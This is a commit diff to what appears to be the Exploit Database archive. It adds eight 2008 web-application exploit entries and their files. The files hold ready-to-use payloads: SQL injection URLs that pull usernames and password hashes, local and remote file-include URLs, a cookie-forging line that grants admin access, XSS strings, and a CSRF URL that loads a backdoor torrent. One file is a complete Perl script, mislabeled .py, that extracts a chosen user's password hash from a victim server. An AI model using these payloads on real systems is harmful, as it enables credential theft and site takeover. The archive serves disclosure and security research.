Updated 02_17_2014

files.csv

@@ -28453,3 +28453,11 @@ id,file,description,date,author,platform,type,port
 31670,platforms/php/webapps/31670.txt,"WordPress <= 2.3.3 'cat' Parameter Directory Traversal Vulnerability",2008-04-18,"Gerendi Sandor Attila",php,webapps,0
 31671,platforms/php/webapps/31671.html,"TorrentFlux 2.3 admin.php Administrator Account Creation CSRF",2008-04-18,"Michael Brooks",php,webapps,0
 31672,platforms/php/webapps/31672.txt,"uTorrent WebUI 0.310 beta 2 Cross-Site Request Forgery Vulnerability",2008-04-18,th3.r00k,php,webapps,0
+31673,platforms/multiple/webapps/31673.txt,"Azureus HTML WebUI 0.7.6 Cross-Site Request Forgery Vulnerability",2008-04-18,th3.r00k,multiple,webapps,0
+31674,platforms/php/webapps/31674.txt,"XOOPS Recette 2.2 'detail.php' SQL Injection Vulnerability",2008-04-19,S@BUN,php,webapps,0
+31675,platforms/php/webapps/31675.txt,"Chimaera Project Aterr 0.9.1 Multiple Local File Include Vulnerabilities",2008-04-19,KnocKout,php,webapps,0
+31676,platforms/php/webapps/31676.txt,"Host Directory PRO Cookie Security Bypass Vulnerability",2008-04-20,Crackers_Child,php,webapps,0
+31677,platforms/php/webapps/31677.txt,"Advanced Electron Forum 1.0.6 'beg' Parameter Cross Site Scripting Vulnerability",2008-04-21,ZoRLu,php,webapps,0
+31679,platforms/php/webapps/31679.txt,"PortailPHP 2.0 'mod_search' Remote File Include Vulnerability",2008-04-21,ZoRLu,php,webapps,0
+31681,platforms/php/webapps/31681.py,"XOOPS 2.0.14 Article Module 'article.php' SQL Injection Vulnerability",2008-04-21,Cr@zy_King,php,webapps,0
+31682,platforms/php/webapps/31682.txt,"S9Y Serendipity 1.3 Referer HTTP Header XSS",2008-04-22,"Hanno Boeck",php,webapps,0

platforms/multiple/webapps/31673.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28848/info
+
+Azureus HTML WebUI is prone to a cross-site request-forgery vulnerability.
+
+Successful exploits aid in transferring malicious content to unsuspecting users' computers, aiding in further attacks. Other actions may also be affected, but this has not been confirmed.
+
+Azureus HTML WebUI 0.7.6 is vulnerable; other versions may also be affected. 
+
+http://www.example.com:6886/index.tmpl?d=u&upurl=http://localhost/backdoor.torrent 

platforms/php/webapps/31674.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/28859/info
+
+XOOPS Recette is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Recette 2.2 is vulnerable to this issue; other versions may also be affected.
+
+http://www.example.com/modules/recipe/detail.php?id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,0,uname,pass,111,222+from%2F%2A%2A%2Fxoops_users/*
+
+

platforms/php/webapps/31675.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/28861/info
+
+Aterr is prone to local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit these vulnerabilities using directory-traversal strings to view files and execute local scripts in the context of the webserver process. This may aid in further attacks.
+
+The issues affect Aterr 0.9.1; other versions might also be affected.
+
+http://www.example.com/path/include/functions.inc.php?class=[Local File]
+http://www.example.com/path/include/common.inc.php?file=[Local File] 

platforms/php/webapps/31676.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/28863/info
+
+Host Directory PRO is prone to a security-bypass vulnerability because it fails to properly validate user credentials before performing certain actions.
+
+Exploiting this issue may allow an attacker to bypass certain security restrictions and gain administrative access to the application. This will compromise the application and may aid in further attacks.
+
+javascript:document.cookie = "adm=1 path=/;"; 

platforms/php/webapps/31677.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/28865/info
+
+Advanced Electron Forum (AEF) is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Advanced Electron Forum (AEF) 1.0.6 is vulnerable; other versions may also be affected.
+
+http://www.example.com/index.php?act=members&sortby=1&order=1&beg=[XSS]
+
+

platforms/php/webapps/31679.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/28867/info
+
+PortailPHP is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this issue to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying computer; other attacks are also possible.
+
+PortailPHP 2.0 is vulnerable; other versions may also be vulnerable. 
+
+
+http://www.example.com/portailphp_path/mod_search/index.php?chemin=ZoRlu.txt 

platforms/php/webapps/31681.py

@@ -0,0 +1,78 @@
+source: http://www.securityfocus.com/bid/28879/info
+
+
+XOOPS Article module is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+# Exploit :
+
+#############################################
+
+#Coded By Cr@zy_King http://coderx.org]#
+
+#############################################
+
+use IO::Socket;
+
+if (@ARGV != 3)
+
+{
+
+print "\n-----------------------------------\n";
+
+print "Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it\n";
+
+print "-----------------------------------\n";
+
+print "\n4ever Cra\n";
+
+print "crazy_kinq[at]hotmail.co.uk\n";
+
+print "http://coderx.org\n";
+
+print "\n-----------------------------------\n";
+
+print "\nKullanim: $0 <server> <path> <uid>\n";
+
+print "Ornek: $0 www.victim.com /path 1\n";
+
+print "\n-----------------------------------\n";
+
+exit ();
+
+}
+
+$server = $ARGV[0];
+
+$path = $ARGV[1];
+
+$uid = $ARGV[2];
+
+$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort =>
+
+"80");
+
+printf $socket ("GET
+
+%s/modules/articles/article.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NUL
+L,NULL,NULL,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
+NULL,NULL,NULL/**/FROM/**/xoops_users/**/WHERE/**/uid=$uid/* HTTP/1.0\nHost: %s\nAccept: */*\nConnection:
+
+close\n\n",
+
+$path,$server,$uid);
+
+while(<$socket>)
+
+{
+
+if (/\>(\w{32})\</) { print "\nID '$uid' User Password :\n\n$1\n"; }
+
+}
+
+# Cr@zy_King
+
+# http://coderx.org
+
+# crazy_kinq (at) hotmail.co (dot) uk [email concealed]

platforms/php/webapps/31682.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/28885/info
+
+S9Y Serendipity is prone to an HTML-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or launch other attacks.
+
+S9Y Serendipity 1.3 is vulnerable; other versions may also be affected.
+
+The following proof of concept is available for the referrer issue:
+
+wget --referer='http://<hr onMouseOver="alert(7)">' http://someblog.com/